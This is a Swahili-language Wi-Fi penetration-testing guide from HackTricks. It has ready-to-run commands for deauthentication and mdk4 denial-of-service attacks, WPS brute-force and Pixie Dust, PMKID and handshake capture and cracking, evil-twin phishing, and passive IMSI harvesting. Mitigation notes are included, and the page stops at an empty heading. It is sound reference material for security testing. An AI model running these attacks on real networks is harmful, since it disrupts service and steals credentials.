Pentesting Wifi

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Wifi amri za msingi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Zana

Hijacker & NexMon (Wi-Fi ya ndani ya Android)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Endesha airgeddon na docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Inaweza kufanya mashambulizi ya Evil Twin, KARMA, na Known Beacons kisha kutumia template ya phishing ili kufanikiwa kupata nywila halisi ya mtandao au kunasa maelezo ya kuingia ya mitandao ya kijamii.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Zana hii inaotomatisha mashambulizi ya WPS/WEP/WPA-PSK. Zitafanya yafuatayo moja kwa moja:

• Weka kiolesura katika monitor mode
• Skana mitandao inayowezekana - na ikuruhusu kuchagua waathirika
• Ikiwa WEP - anzisha mashambulizi ya WEP
• Ikiwa WPA-PSK
• Ikiwa WPS: Pixie dust attack na brute-force attack (kuwa mwangalifu, brute-force attack inaweza kuchukua muda mrefu). Kumbuka haitajaribu null PIN au database/generated PINs.
• Jaribu kukamata PMKID kutoka AP ili ku-crack
• Jaribu ku-deauthenticate wateja wa AP ili kukamata handshake
• Ikiwa PMKID au Handshake, jaribu ku-bruteforce ukitumia top5000 passwords.

Attacks Summary

• DoS
• Deauthentication/disassociation – Kutenganisha kila mtu (au ESSID/Client maalum)
• Random fake APs – Ficha mitandao, inaweza kuharibu scanners
• Overload AP – Jaribu kuifanya AP isifanye kazi (kawaida si ya msaada sana)
• WIDS – Cheza na IDS
• TKIP, EAPOL – Baadhi ya mashambulizi maalum ya kufanya DoS kwa baadhi ya APs
• Cracking
• Crack WEP (several tools and methods)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (kwa au bila DoS)
• Open Evil Twin [+ DoS] – Inafaa kukamata captive portal creds na/au kufanya mashambulizi ya LAN
• WPA-PSK Evil Twin – Inafaa kwa network attacks ikiwa unajua password
• WPA-MGT – Inafaa kukamata company credentials
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Inafaa kukamata captive portal creds na/au kufanya mashambulizi ya LAN
• + WPA – Inafaa kukamata WPA handshakes

Open / OWE networks quick notes

• Passive capture on open SSIDs bado inafanya kazi na monitor mode na tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) hufanya per-station key exchange (no PSK), hivyo air frames zimefichwa hata kwenye “open” SSIDs. Kwa kuwa inategemea WPA3, pia inatekeleza 802.11w PMF, ambayo inazuia spoofed deauth/disassoc frames.
• OWE does not authenticate joiners: mtu yoyote anaweza associate, hivyo verify client isolation badala ya kuamini dai za uuzaji. Bila isolation, ARP spoofing au responder-style poisoning kwenye L2 ya ndani bado inafanya kazi.
• Evil Twin bado inawezekana kwenye open/OWE SSIDs kwa kuwasilisha signal yenye nguvu zaidi; PMF inachukua tu njia fupi ya deauth. Ikiwa victims watakubali forged TLS cert, full HTTP(S) MitM inapatikana tena.
• Broadcast poisoning kwenye open guest Wi-Fi kwa urahisi hutoa creds/hashes (LLMNR/NBT-NS/mDNS). See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Description from here:.

Deauthentication attacks, njia inayotumika sana katika Wi-Fi hacking, zinahusisha kughushi “management” frames ili forcefully disconnect devices from a network. Hizi unencrypted packets zinaudanganya clients kuwaza zinatoka kwenye mtandao halali, na kutoa uwezo kwa attackers kukusanya WPA handshakes kwa shughuli za cracking au kuendelea kuvuruga network connections. Taktiki hii, inayotia wasiwasi kwa ugumu wake, inatumiwa sana na ina athari kubwa kwa usalama wa mtandao.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 inamaanisha deauthentication
• 1 ni idadi ya deauths za kutuma (unaweza kutuma nyingi ikiwa unataka); 0 inamaanisha uzitume kwa mfululizo
• -a 00:14:6C:7E:40:80 ni anwani ya MAC ya access point
• -c 00:0F:B5:34:30:30 ni anwani ya MAC ya client ambayo itafanywa deauthenticate; ikiwa hii itaachwa basi broadcast deauthentication itatumwa (haifanyi kazi kila wakati)
• ath0 ni jina la interface

Disassociation Packets

Disassociation packets, sawa na deauthentication packets, ni aina ya management frame zinazotumika katika mitandao ya Wi-Fi. Vipaketi hivi vinatumika kuvunja muunganisho kati ya kifaa (kama laptop au smartphone) na access point (AP). Tofauti kuu kati ya disassociation na deauthentication iko katika mazingira ya matumizi yao. Wakati AP hutuma deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, restart, or relocating, thereby necessitating the disconnection of all connected nodes.

Shambulio hili linaweza kufanywa kwa mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Zaidi DOS attacks na mdk4

Kwenye here.

ATTACK MODE b: Beacon Flooding

Inatuma beacon frames ili kuonyesha fake APs kwa clients. Hii inaweza wakati mwingine kusababisha crash ya network scanners na hata drivers!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Kutumiza authentication frames kwa Access Points (APs) zote zinazopatikana ndani ya umbali kunaweza kuzidisha mzigo kwenye APs hizi, hasa wakati wateja wengi wanahusika. Trafiki hii nyingi inaweza kusababisha kutokuwa imara kwa mfumo, na kusababisha baadhi ya APs kusimama au hata kurudishwa upya.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Kupima Access Points (APs) huangalia kama SSID inaonyeshwa ipasavyo na kuthibitisha anuwai ya AP. Teknika hii, ikishirikiana na bruteforcing hidden SSIDs kwa kutumia au bila wordlist, husaidia kutambua na kupata mitandao iliyofichwa.

ATTACK MODE m: Michael Countermeasures Exploitation

Kutuma vifurushi vya nasibu au nakala kwa safu tofauti za QoS kunaweza kuchochea Michael Countermeasures kwenye TKIP APs, ikisababisha AP kuzimwa kwa dakika moja. Njia hii ni mbinu yenye ufanisi ya shambulio la DoS (Denial of Service).

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Kumwaga AP kwa EAPOL Start frames huunda fake sessions, huweka AP chini ya mzigo na kuzuia wateja halali. Vinginevyo, kuingiza fake EAPOL Logoff messages kunawatenganisha wateja kwa nguvu; mbinu zote mbili huvuruga huduma ya mtandao kwa ufanisi.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Attacks for IEEE 802.11s mesh networks

Mashambulizi mbalimbali dhidi ya usimamizi wa viungo na routing katika mitandao ya mesh.

ATTACK MODE w: WIDS Confusion

Kuunganisha wateja kwa njia ya msalaba na nodes nyingi za WDS au fake rogue APs kunaweza kudanganya Intrusion Detection and Prevention Systems, kuleta mchanganyiko na uwezekano wa matumizi mabaya ya mfumo.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer featuring diverse packet sources and a comprehensive set of modifiers for packet manipulation.

Airggedon

Airgeddon inatoa sehemu kubwa ya attacks zilizopendekezwa katika maelezo yaliyotangulia:

WPS

WPS (Wi-Fi Protected Setup) inarahisisha mchakato wa kuunganisha vifaa kwenye router, ikiongeza kasi na urahisi wa setup kwa networks zilizofichwa kwa WPA au WPA2 Personal. Haiwafi kwa usalama wa WEP unaovamiwa kwa urahisi. WPS inatumia PIN ya tarakimu 8, ambayo inathibitishwa kwa nusu mbili, jambo linalofanya iwe rahisi kwa brute-force attacks kutokana na idadi ndogo ya mchanganyiko (uwezekano 11,000).

WPS Bruteforce

Kuna zana kuu 2 za kufanya kitendo hiki: Reaver na Bully.

• Reaver imeundwa kuwa attack thabiti na ya vitendo dhidi ya WPS, na imethibitishwa dhidi ya aina mbalimbali za access points na implementations za WPS.
• Bully ni new implementation ya WPS brute force attack, imeandikwa kwa C. Ina faida kadhaa juu ya original reaver code: utegemezi mdogo, utendaji ulioboreshwa wa memory na cpu, utunzaji sahihi wa endianness, na seti ya chaguzi zenye nguvu zaidi.

Shambulio linatumia udhaifu wa WPS PIN, hasa kufichuka kwa tarakimu nne za kwanza na jukumu la tarakimu ya mwisho kama checksum, jambo linalorahisisha brute-force attack. Hata hivyo, ulinzi dhidi ya brute-force attacks, kama kuzuia MAC addresses za washambuliaji wakali, huhitaji MAC address rotation ili kuendelea na shambulio.

Baada ya kupata WPS PIN kwa kutumia zana kama Bully au Reaver, mshambuliaji anaweza kubaini WPA/WPA2 PSK, akihakikisha ufikiaji wa mtandao wa kudumu.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Mbinu hii iliyoboreshwa inalenga WPS PINs kwa kutumia udhaifu uliyojulikana:

1. PINs zilizogunduliwa awali: Tumia hifadhidata ya PINs zilizojulikana zinazohusishwa na watengenezaji maalum wanaojulikana kutumia WPS PINs zinazofanana. Hifadhidata hii inaunganisha octet tatu za kwanza za MAC-addresses na PINs zinazowezekana kwa watengenezaji hao.
2. Algoritimu za uzalishaji PIN: Tumia algoritimu kama ComputePIN na EasyBox, ambazo hutoa WPS PINs kulingana na MAC-address ya AP. Algorithm ya Arcadyan pia inahitaji device ID, ikiongeza tabaka kwenye mchakato wa uzalishaji wa PIN.

WPS Pixie Dust attack

Dominique Bongard aligundua kasoro katika baadhi ya Access Points (APs) kuhusu uundaji wa misimbo ya siri, inayojulikana kama nonces (E-S1 na E-S2). Ikiwa nonces hizi zinaweza kugunduliwa, cracking ya WPS PIN ya AP inakuwa rahisi. AP inaonyesha PIN ndani ya msimbo maalum (hash) kuthibitisha kuwa ni halali na sio fake (rogue) AP. Nonces hizi kwa msingi ni “keys” za kufungua “safe” inayoshikilia WPS PIN. Tazama zaidi hapa.

Kwa maneno rahisi, tatizo ni kwamba baadhi ya APs hazikutumia keys za kutosha nasibu kwa ajili ya encrypting PIN wakati wa mchakato wa kuunganishwa. Hii inafanya PIN kuwa nyeti kwa kukadiriwa kutoka nje ya mtandao (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Ikiwa hutaki kubadili kifaa hadi monitor mode, au reaver na bully zinapata shida, unaweza kujaribu OneShot-C. Zana hii inaweza kutekeleza Pixie Dust attack bila ya kuhamisha hadi monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Baadhi ya mifumo iliyoundwa vibaya hata huwaruhusu Null PIN (PIN tupu au isiyokuwepo) kupewa ufikiaji, jambo ambalo ni la ajabu sana. Chombo Reaver kina uwezo wa kujaribu udhaifu huu, tofauti na Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

All the proposed WPS attacks can be easily performed using airgeddon.

• 5 and 6 zinakuwezesha kujaribu PIN yako maalum (ikiwa unayo)
• 7 and 8 hufanya Pixie Dust attack
• 13 inakuwezesha kujaribu NULL PIN
• 11 and 12 zitakusanya PINs zinazohusiana na AP iliyochaguliwa kutoka kwenye databases zinazopatikana na tengeneza PINs zinazowezekana kwa kutumia: ComputePIN, EasyBox na kwa hiari Arcadyan (inashauriwa, kwa nini si?)
• 9 and 10 zitajaribu kila PIN inayowezekana

WEP

Kwa nini inashindwa

• RC4 seed ni tu IV (24 bits) + shared key. IV ni cleartext, ndogo (2^24), na hurudia haraka, hivyo ciphertexts zenye IV sawa zinatumia tena keystream.
• Kufanya XOR kati ya ciphertexts mbili zenye keystream sawa leaks PlaintextA ⊕ PlaintextB; predictable headers + RC4 KSA biases (FMS) hukuruhusu “vote” key bytes. PTW huboresha hili kwa kutumia trafiki ya ARP kupunguza mahitaji hadi mamia elfu ya packets badala ya mamilioni.
• Uadilifu ni tu CRC32 (linear/unkeyed), hivyo mshambuliaji anaweza kubadilisha bits na kuhesabu tena CRC32 bila key → packet forgery/replay/ARP injection wakati akisubiri IVs.

Uvunjaji wa vitendo ni deterministic:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon bado inatoa “All-in-One” WEP workflow ikiwa unapendelea UI iliyoongozwa.

WPA/WPA2 PSK

PMKID

Mnamo 2018, hashcat revealed njia mpya ya shambulio, ya kipekee kwa sababu inahitaji tu paketi moja tu na haitahitaji wateja wowote kuunganishwa na AP lengwa—ni mwingiliano kati ya mshambuliaji na AP tu.

Router nyingi za kisasa zinaongeza uwanja wa hiari kwenye first EAPOL frame wakati wa association, unaojulikana kama Robust Security Network. Hii inajumuisha PMKID.

Kama chapisho la asili linavyoeleza, the PMKID is created using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Kuzingatia kwamba “PMK Name” ni thabiti, tunajua BSSID ya AP na station, na PMK ni sawa na ile kutoka kwa 4-way handshake kamili, hashcat inaweza kutumia taarifa hii kuvunja PSK na kurejesha passphrase!

Ili gather taarifa hizi na bruteforce nenosiri kwa kienyeji unaweza kufanya:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs captured zitaonyeshwa kwenye console na pia zitahifadhiwa ndani ya _ /tmp/attack.pcap_
Sasa, badilisha capture kuwa muundo wa hashcat/john na crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Tafadhali kumbuka muundo wa hash sahihi una 4 sehemu, kama: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Ikiwa yako tu ina 3 sehemu, basi ni batili (urekodi wa PMKID haukuwa sahihi).

Tambua kwamba hcxdumptool pia inarekodi handshakes (kitu kama hiki kitaonekana: MP:M1M2 RC:63258 EAPOLTIME:17091). Unaweza badilisha handshakes hadi muundo wa hashcat/john kwa kutumia cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Nimegundua kwamba baadhi ya handshakes zilizokamatwa kwa kutumia tool hii hazikuweza ku-crack hata nikiwa najua password sahihi. Ninapendekeza kukamata handshakes pia kwa njia za jadi ikiwa inawezekana, au kukamata kadhaa kwa kutumia tool hii.

Kukamata handshake

Shambulio dhidi ya WPA/WPA2 networks linaweza kufanywa kwa kukamata handshake na kujaribu ku-crack password offline. Mchakato huu unahusisha kufuatilia mawasiliano ya mtandao maalum na BSSID kwenye channel fulani. Hapa kuna mwongozo mfupi:

1. Tambua BSSID, channel, na connected client wa mtandao lengwa.
2. Tumia airodump-ng kufuatilia trafiki ya mtandao kwenye channel na BSSID zilizotajwa, ukitarajia kukamata handshake. Amri itaonekana kama ifuatavyo:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Ili kuongeza nafasi ya kukamata handshake, kata mteja kutoka kwenye mtandao kwa muda mfupi ili kumlazimisha kuthibitishwa tena. Hili linaweza kufanywa kwa kutumia amri ya aireplay-ng, ambayo inatuma deauthentication packets kwa mteja:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Kumbuka kwamba kwa kuwa mteja alikuwa deauthenticated, inaweza kujaribu kuungana na AP tofauti au, katika kesi nyingine, na mtandao tofauti.

Mara tu taarifa za handshake zinapoonekana katika airodump-ng, hii inamaanisha kwamba handshake imekaptiwa na unaweza kuacha kusikiliza:

Mara handshake imekaptiwa, unaweza crack kwa kutumia aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Angalia ikiwa handshake iko kwenye faili

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Ikiwa zana hii inapata handshake isiyokamilika ya ESSID kabla ya ile iliyokamilika, haitagundua ile halali.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Kubashiri PSK mtandaoni kwa kasi zaidi kupitia wpa_supplicant ctrl socket (no clients/PMKID)

Wakati hakuna clients karibu na AP inakataa PMKID, unaweza kupitia PSKs mtandaoni bila kurudia kuanzisha supplicants:

• Patch wpa_supplicant.c ili kulazimisha dur = 0; katika auth failure backoff logic (kando ya ssid->auth_failures), kwa ufanisi kuzima timer ya temporary-disable.
• Endesha daemon moja na control socket:

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• Endesha kupitia control interface, ukitumia tena scan na network ile ile:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

Mzunguko mdogo wa Python unaosoma matukio ya socket (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED) unaweza kujaribu ~100 makisia kwa takriban dakika 5 bila mzigo wa skani. Bado inasababisha kelele na inaweza kugunduliwa, lakini inazuia kuanzisha upya mchakato kwa kila jaribio na backoff delays.

WPA Enterprise (MGT)

Katika mipangilio ya WiFi ya enterprise, utakutana na mbinu mbalimbali za uthibitishaji, kila moja ikitoa viwango tofauti vya usalama na sifa za usimamizi. Unapotumia zana kama airodump-ng kuchunguza trafiki ya mtandao, unaweza kuona vitambulisho vya aina hizi za uthibitishaji. Baadhi ya mbinu za kawaida ni pamoja na:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Njia hii inasaidia hardware tokens na one-time passwords ndani ya EAP-PEAP. Tofauti na MSCHAPv2, haifanyi peer challenge na inatuma passwords kama maandishi wazi kwa access point, ikiweka hatari kwa downgrade attacks.

2. EAP-MD5 (Message Digest 5):

• Inajumuisha kutuma MD5 hash ya password kutoka kwa client. Haipendekezwi kwa sababu inaweza kushambuliwa kwa dictionary attacks, hauna server authentication, na hawezi kuzalisha WEP keys maalum za session.

3. EAP-TLS (Transport Layer Security):

• Inatumia certificates upande wa client na server kwa authentication na inaweza kuzalisha kwa nguvu WEP keys za user-based na session-based kwa kulinda mawasiliano.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Inatoa mutual authentication kupitia tunnel iliyosimbwa, pamoja na njia ya kutengeneza dynamic, per-user, per-session WEP keys. Inahitaji certificates za upande wa server pekee, na clients hutumia credentials.

5. PEAP (Protected Extensible Authentication Protocol):

• Inafanya kazi kwa njia sawa na EAP kwa kuunda TLS tunnel kwa mawasiliano yaliyolindwa. Hii inaruhusu matumizi ya weaker authentication protocols juu ya EAP kwa sababu ya ulinzi wa tunnel.
• PEAP-MSCHAPv2: Mara nyingi huitwa PEAP, inaunganisha mekanismi dhaifu ya MSCHAPv2 challenge/response na TLS tunnel ya ulinzi.
• PEAP-EAP-TLS (or PEAP-TLS): Sawa na EAP-TLS lakini huanzisha TLS tunnel kabla ya kubadilishana certificates, ikitoa safu nyingine ya usalama.

Unaweza kupata taarifa zaidi kuhusu njia hizi za authentication here and here.

Kukamata username

Ukisoma https://tools.ietf.org/html/rfc3748#page-27 inaonekana kuwa ikiwa unatumia EAP ujumbe za “Identity” lazima ziunge mkono, na username itatumwa wazi katika ujumbe za “Response Identity”.

Hata ukitumia moja ya mbinu salama zaidi za authentication: PEAP-EAP-TLS, inawezekana kukamata username inayotumwa katika protokoli ya EAP. Ili kufanya hivyo, kamata mawasiliano ya authentication (anzisha airodump-ng ndani ya channel na wireshark katika interface ileile) na filter packets kwaeapol.\
Ndani ya kifurushi cha “Response, Identity”, username ya client itaonekana.

Utambulisho Binafsi (Anonymous Identities)

Kuficha utambulisho kunasaidiwa na EAP-PEAP na EAP-TTLS. Katika muktadha wa mtandao wa WiFi, ombi la EAP-Identity kawaida linaanzishwa na access point (AP) wakati wa mchakato wa association. Ili kuhakikisha ulinzi wa anonimity ya mtumiaji, jibu kutoka kwa EAP client kwenye kifaa cha mtumiaji linajumuisha tu taarifa muhimu zinazohitajika kwa server ya RADIUS ya awali kushughulikia ombi. Dhana hii inaonyeshwa kupitia matukio yafuatayo:

• EAP-Identity = anonymous
• Katika tukio hili, watumiaji wote wanatumia jina bandia “anonymous” kama kitambulisho chao cha mtumiaji. initial RADIUS server hufanya kazi kama EAP-PEAP au EAP-TTLS server, ikiwa juu ya kusimamia sehemu ya server ya itifaki ya PEAP au TTLS. Mbinu ya ndani (iliyoilindwa) ya authentication kisha inashughulikiwa kwa ndani au kupelekwa kwa remote (home) RADIUS server.
• EAP-Identity = anonymous@realm_x
• Katika hali hii, watumiaji kutoka realms tofauti wanaficha utambulisho wao huku wakionyesha realms zao. Hii inaruhusu initial RADIUS server ku-proxy maombi ya EAP-PEAP au EAP-TTLS kwa RADIUS servers katika realm zao za nyumbani, ambazo zinatenda kama PEAP au TTLS server. initial RADIUS server inafanya kazi kama node ya relay ya RADIUS tu.
• Vinginevyo, initial RADIUS server inaweza kufanya kazi kama EAP-PEAP au EAP-TTLS server na kushughulikia mbinu ya authentication iliyoilindwa au kuituma kwa server nyingine. Chaguo hili hurahisisha kusanidi sera tofauti kwa realms mbalimbali.

Katika EAP-PEAP, mara tu tunnel ya TLS itakapojengwa kati ya PEAP server na PEAP client, PEAP server huanzisha ombi la EAP-Identity na kuutuma kupitia TLS tunnel. Client inajibu ombi hili la pili la EAP-Identity kwa kutuma jibu la EAP-Identity linalojumuisha utambulisho halisi wa mtumiaji kupitia tunnel iliyosimbwa. Njia hii inazuia kwa ufanisi ufichuzi wa utambulisho halisi wa mtumiaji kwa mtu yeyote anayeweza kusikiliza trafiki ya 802.11.

EAP-TTLS inafuata utaratibu kidogo tofauti. Kwa EAP-TTLS, client kwa kawaida inathibitisha kwa kutumia PAP au CHAP, zikilindwa na TLS tunnel. Katika kesi hii, client inajumuisha attribute ya User-Name na ama Password au CHAP-Password katika ujumbe wa kwanza wa TLS unaotumwa baada ya kuanzishwa kwa tunnel.

Bila kujali protokoli iliyochaguliwa, server ya PEAP/TTLS hupata utambulisho halisi wa mtumiaji baada ya TLS tunnel kujengwa. Utambulisho halisi unaweza kuwakilishwa kama user@realm au user pekee. Ikiwa PEAP/TTLS server pia ndiye anayeweka wasifu wa mtumiaji, sasa anamiliki utambulisho wa mtumiaji na anaendelea na mbinu ya authentication iliyolindwa na TLS tunnel. Vinginevyo, PEAP/TTLS server inaweza kupeleka ombi jipya la RADIUS kwa home RADIUS server ya mtumiaji. Ombi jipya la RADIUS halijumuishi safu ya PEAP au TTLS. Katika matukio ambapo mbinu iliyoilindwa ya authentication ni EAP, ujumbe wa ndani wa EAP hutumwa kwa home RADIUS server bila kifuniko cha EAP-PEAP au EAP-TTLS. Attribute ya User-Name ya ujumbe wa RADIUS unaotoka inaweka utambulisho halisi wa mtumiaji, ikichukua nafasi ya User-Name ya anonymous kutoka kwa ombi la RADIUS lilioingia. Wakati mbinu iliyoilindwa ya authentication ni PAP au CHAP (inayoungwa mkono tu na TTLS), User-Name na attributes nyingine za authentication zilizotolewa kutoka kwa TLS payload zinachukuliwa na kuwekwa katika ujumbe wa RADIUS unaotumwa, zikichukua nafasi ya User-Name ya anonymous na attributes za TTLS EAP-Message zilizopo katika ombi la RADIUS lilioingia.

Kwa habari zaidi angalia https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication kwa kutumia EAP‑SIM/EAP‑AKA juu ya 802.1X inaweza leak permanent subscriber identifier (IMSI) kwa cleartext wakati wa hatua ya unauthenticated identity ikiwa deployment haitekelezi pseudonyms/protected identities au TLS tunnel karibu na inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Notes:
- Inafanya kazi kabla ya tuneli yoyote ya TLS ikiwa usanifu unatumia EAP‑SIM/AKA kiojumuishi bila vitambulisho vilivyolindwa/majina bandia.
- Thamani iliyofichuliwa ni kitambulisho cha kudumu kilichounganishwa na SIM ya abonenti; kukusanya kunawawezesha ufuatiliaji wa muda mrefu na matumizi mabaya ya telecom yanayofuata.

Athari
- Faragha: ufuatiliaji wa kudumu wa mtumiaji/kifaa kutokana na kunaswa pasivu kwa Wi‑Fi katika maeneo ya umma.
- Kuanzisha matumizi mabaya ya telecom: kwa IMSI, mshambuliaji mwenye ufikiaji wa SS7/Diameter anaweza kuulizia eneo au kujaribu kuingilia/kunasa mawasiliano ya simu/SMS na kuiba MFA.

Mikakati ya kupunguza / vitu vya kuangalia
- Thibitisha kwamba wateja wanatumia anonymous outer identities (pseudonyms) kwa EAP‑SIM/AKA kama inavyopendekezwa na 3GPP (mf., 3GPP TS 33.402).
- Pendelea kuweka hatua ya utambulisho ndani ya tuneli (mf., EAP‑TTLS/PEAP ikibeba inner EAP‑SIM/AKA) ili IMSI isitumwe wazi kamwe.
- Kunasa kifurushi (packet captures) za association/auth hazipaswi kamwe kufichua IMSI ghafi katika EAP-Response/Identity.

Related: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

